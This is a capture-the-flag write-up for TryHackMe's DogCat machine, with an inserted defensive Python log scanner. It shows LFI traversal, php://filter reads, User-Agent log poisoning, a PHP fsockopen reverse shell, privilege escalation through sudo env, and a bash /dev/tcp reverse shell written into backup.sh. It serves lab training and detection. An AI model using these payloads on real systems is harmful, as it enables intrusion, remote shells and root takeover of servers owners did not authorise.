THM | DogCat WriteUp

MaliciousX



Welcome THT family, in this thread, I am going to explain the solving process of the DogCat machine on the TryHackMe website.

This CTF is based on an LFI exploit, so to understand it better you should check some of the LFI threads in the forum.

First, we begin with a Nmap scan.


nmap -sS -sV MachineIP



We can see that ports 80 and 20 are open. Since port 80 is open, the machine hosts a website, so we open it by typing http://MachineIP into the browser.

Looking at the URL, we see that the page runs a PHP script that displays the images stored in the dog/ or cat/ folder, depending on whether the value "dog" or "cat" is passed in the "view" parameter.


http://MachineIP/?view=dog

We try some simple LFI payloads to check whether we can view /etc/passwd, with a request URL like this:

http://MachineIP/?view=../../../../../../../etc/passwd

Access Denied.

I type "Php LFI Filter" into Google, and we will try the parameter given on that site, which base64-encodes the file:

http://MachineIP/?view=php://filter/convert.base64-encode/resource=dog

It gives us something base64-encoded.



Let's see the content of the text that is given to us by decoding it.



Here we see that we can also read the source of the index.php file with the help of directory traversal.
The important point here is that the file extension is taken from an "ext" variable that we can pass ourselves.



Now we check whether we can read the /etc/passwd file with the following request.


The method we tried worked!



Now we can look for the log file that records all our requests. After some research, we find the server's logs in /var/log/apache2/access.log. We see our latest request there.



We see that the log records us as a Mozilla Firefox user. So we check whether we can inject PHP code into our User-Agent header that will then be executed by the main PHP file. We can use Burp Suite Repeater to test this over and over. I'm trying by typing TurkHackTeam.


We are victorious! We can inject PHP through the User-Agent.

Now that we know we can run any code, let's open a reverse shell and get into the system.

In our terminal we start nc -lvnp 4444 (you can use any port number you want); now we are listening for connections coming back to our machine.

We go to Pentest Monkey or any other reverse shell website and look at the PHP reverse shell.

MachineIP/?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php -r '$sock=fsockopen("YourIPAddress",theportyousniff);exec("/bin/bash -i <&3 >&3 2>&3");'

After this, we are in the system :) I will show the rest of this part through the terminal commands.
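From the defender's side, the whole chain above (traversal in "view", the php://filter wrapper, the empty "ext" value and PHP tags in the User-Agent) is visible in the very same access.log that got poisoned. The script below is an added example, not part of the original writeup: it parses Apache combined-format lines and flags those indicators. The sample log lines are constructed for the example and are not taken from the machine.

```python
import re

# Apache "combined" log format: the request line and the User-Agent are the two
# fields in which the DogCat chain leaves traces.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (name, pattern, field) - each check inspects one parsed field.
CHECKS = [
    ("traversal", re.compile(r"(\.\./|%2e%2e%2f|%2e%2e/|\.\.%2f)", re.I), "req"),
    ("php_wrapper", re.compile(r"php://", re.I), "req"),
    ("ext_override", re.compile(r"[?&]ext=", re.I), "req"),
    ("php_in_user_agent", re.compile(r"<\?(php|=)", re.I), "ua"),
]


def parse_line(line):
    """Return the parsed fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def scan_logs(lines):
    """Return one hit per suspicious line: source IP, request line and the checks that fired."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not combined-format entries
        reasons = [name for name, rx, field in CHECKS if rx.search(rec[field])]
        if reasons:
            hits.append({"ip": rec["ip"], "request": rec["req"], "reasons": reasons})
    return hits


# Constructed sample lines (assumed values, not real machine logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Nov/2019:10:00:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Nov/2019:10:00:05 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    "10.0.0.9 - - [16/Nov/2019:10:00:09 +0000] \"GET /?view=dog/../../../../var/log/apache2/access.log&ext= HTTP/1.1\" 200 4000 \"-\" \"<?php echo 'TurkHackTeam'; ?>\"",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOG):
        print(hit["ip"], hit["reasons"], hit["request"])
```

Run it against a real access.log with `scan_logs(open(path))`; the normal "?view=dog" request produces no hit, while the filter read and the poisoned log request are both flagged with their reasons.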

#Let's find what CTF wants!

Now we are in the system. By typing 'ls' we list the files in the directory we landed in. We reach our goal by typing cat flag.php into the terminal.
Code:
www-data@5ab1679239ec:/var/www/html$ ls
ls
cat.php
cats
dog.php
dogs
flag.php
index.php
style.css
test.php

By typing cd .. in the terminal, we go up one level in the directory tree and run 'ls' again.
Code:
www-data@5ab1679239ec:/var/www$ ls
ls
flag2_QMW7JvaY2LvK.txt
html

Our 3rd target is in the /root folder, so we need to escalate our privileges to get it. We type sudo -l, and it shows us that we can run the "/usr/bin/env" command as root without a password. We escalate to root, enter the root folder, and all that is left for our 3rd goal is to type cat flag3.txt into the terminal.
Code:
www-data@5ab1679239ec:/var/www$ sudo /usr/bin/env /bin/bash
sudo /usr/bin/env /bin/bash
whoami
root

cd /root
ls
flag3.txt

The fourth flag is outside this container. You can confirm this by looking at the "/opt/backups" backup archive.
For our last target, we need to start a reverse shell again.

Code:
echo "#!/bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1234 0>&1'" >> backup.sh


Code:
root@dogcat:~# ls
ls
container
flag4.txt
#CTF Answers
